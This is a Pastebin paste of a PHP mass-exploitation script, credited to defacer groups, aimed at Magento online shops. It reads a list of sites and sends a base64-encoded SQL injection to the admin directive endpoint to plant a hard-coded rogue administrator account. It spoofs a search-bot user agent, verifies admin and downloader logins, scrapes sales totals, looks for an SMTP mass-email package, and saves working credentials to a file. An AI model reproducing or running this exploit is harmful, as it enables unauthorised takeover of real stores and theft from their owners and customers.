Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- error_reporting(0);
- set_time_limit(0);
- /*
- ----------------------
- Name : Auto Exploiter Magento
- Date : 27/02/2016
- Thank's : Ja , Kevin a.k.a Mr.K , ANGK3RS T3AM
- ----------------------
- IndoXploit Coder's | Bug7sec Team | Defacer Tersakiti Team
- ----------------------
- Tuban Cyber Team
- ----------------------
- */
- $username = "shortcut";
- $password = "bug7sec";
- $email = "shor7cut-".time()."@gmail.com";
- function ck_admin($site,$username,$password,$email){
- $a="popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);SET @SALT = 'rp';SET @PASS = CONCAT(MD5(CONCAT( @SALT , '".$password."') ), CONCAT(':', @SALT ));SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','".$email."','".$username."',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '".$username."'),'Firstname');";
- $bs=base64_encode($a);
- $post=array(
- "___directive" => "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
- "filter" => $bs,
- "forwarded" => 1
- );
- echo "|_[ Check admin ... ";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "$site/admin/Cms_Wysiwyg/directive/index/");
- curl_setopt($ch, CURLOPT_HEADER, false);
- curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT ,0);
- curl_setopt($ch, CURLOPT_TIMEOUT, 30);
- curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
- curl_setopt($ch, CURLOPT_VERBOSE, false);
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
- $data = curl_exec($ch);
- $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
- curl_close($ch);
- $re = "/<input name=\"form_key\" type=\"hidden\" value=\"(.*?)\" \\/>/";
- preg_match($re, $data, $matches);
- if($matches[1]){
- echo "w00t\r\n";
- return true;
- }
- echo "JM800t\r\n";
- echo "|\r\n";
- return false;
- }
- function ck_pass($site,$email){
- echo "|_[ Check forgotpass ... ";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "$site/index.php/admin/index/forgotpassword/");
- curl_setopt($ch, CURLOPT_HEADER, false);
- curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT ,0);
- curl_setopt($ch, CURLOPT_TIMEOUT, 60);
- curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
- curl_setopt($ch, CURLOPT_VERBOSE, false);
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, "email=".$email."");
- $data = curl_exec($ch);
- $re = "/success-msg/";
- preg_match($re, $data, $matches);
- if($matches[0]){
- return true;
- echo "w00t\r\n";
- echo "|\r\n";
- }else{
- echo "JM800t\r\n";
- echo "|\r\n";
- return false;
- }
- echo "|\r\n";
- }
- function ck_price($data){
- $re = "/<span class=\"price\">(.*?)<\\/span>/";
- preg_match_all($re, $data, $matches);
- $price = "|_[ Sales/Orders : ".$matches[0][0]."/".$matches[0][1]."\r\n";
- return $price;
- }
- function save($name,$data){
- $myfile = fopen($name, "a+") or die("Unable to open file!");
- fwrite($myfile, $data);
- fclose($myfile);
- }
- function ck_login($site,$username,$password){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "$site/admin");
- curl_setopt($ch, CURLOPT_HEADER, false);
- curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT ,0);
- curl_setopt($ch, CURLOPT_TIMEOUT, 60);
- curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
- curl_setopt($ch, CURLOPT_VERBOSE, false);
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, "login[username]=".$username."&login[password]=".$password."");
- $data = curl_exec($ch);
- $re = "/class=\"link-logout\">(.*?)<\\/a>/";
- preg_match($re, $data, $matches);
- if($matches[1]=="Log Out"){
- echo "|_[ Login admin ... w00t\r\n";
- echo ck_price($data);
- return true;
- }else{
- echo "|_[ Login admin ... JM800t\r\n";
- return false;
- }
- }
- function ck_download($site,$username,$password){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "$site/downloader/index.php");
- curl_setopt($ch, CURLOPT_HEADER, false);
- curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT ,0);
- curl_setopt($ch, CURLOPT_TIMEOUT, 60);
- curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
- curl_setopt($ch, CURLOPT_VERBOSE, false);
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, "login[username]=".$username."&login[password]=".$password."");
- $data = curl_exec($ch);
- //echo $data;
- if(preg_match("/Log Out/",$data)){
- echo "|_[ Login downloader w00t\r\n";
- $login = true;
- if(preg_match("/Warning: Your Magento folder does not have sufficient write permissions./",$data)){
- echo "|_[ Kesalahan permissions\r\n";
- }else{
- if(eregi("Grizzly_MassEmail", $data)){
- echo "|_[ Package Smtp w00t\r\n";
- $smtp = true;
- }else{
- $smtp = false;
- echo "|_[ Package Smtp w00t\r\n";
- }
- }
- if($login){
- save("magento.txt","[Login] $site,$username,$password \r\n");
- if($smtp){
- save("magento.txt","[Login+SMTP] $site,$username,$password \r\n");
- }
- }
- }else{
- echo "|_[ Login downloader .. JM800t\r\n";
- return false;
- }
- }
- if(isset($argv[1])){
- if(file_exists($argv[1])){
- $shc_fgt = file_get_contents($argv[1]);
- $explodes = explode("\r\n", $shc_fgt);
- cover();
- $no=1;
- $no_c = count($explodes);
- $v=0;
- foreach ($explodes as $site) {
- unlink(getcwd().'/cookie.txt');
- echo "|----[$no|$no_c|$v]----\r\n";
- echo "|-[ $site\r\n";
- if(ck_admin($site,$username,$password,$email)){
- if(ck_pass($site,$email)){
- echo "w00t\r\n";
- ck_login($site,$username,$password);
- ck_download($site,$username,$password);
- echo "|\r\n";
- $v++;
- }
- }
- $no++;
- }
- }
- }
- function cover($site){
- echo "|-------------------------------------------|\r\n";
- echo "| Exploit Magento |\r\n";
- echo "|-------------------------------------------|\r\n";
- echo "|SHOR7CUT | BUG7SEC | DEFACER TERSAKITI TEAM|\r\n";
- echo "|-------------------------------------------|\r\n";
- echo "|\r\n";
- }
- ?>
Add Comment
Please, Sign In to add comment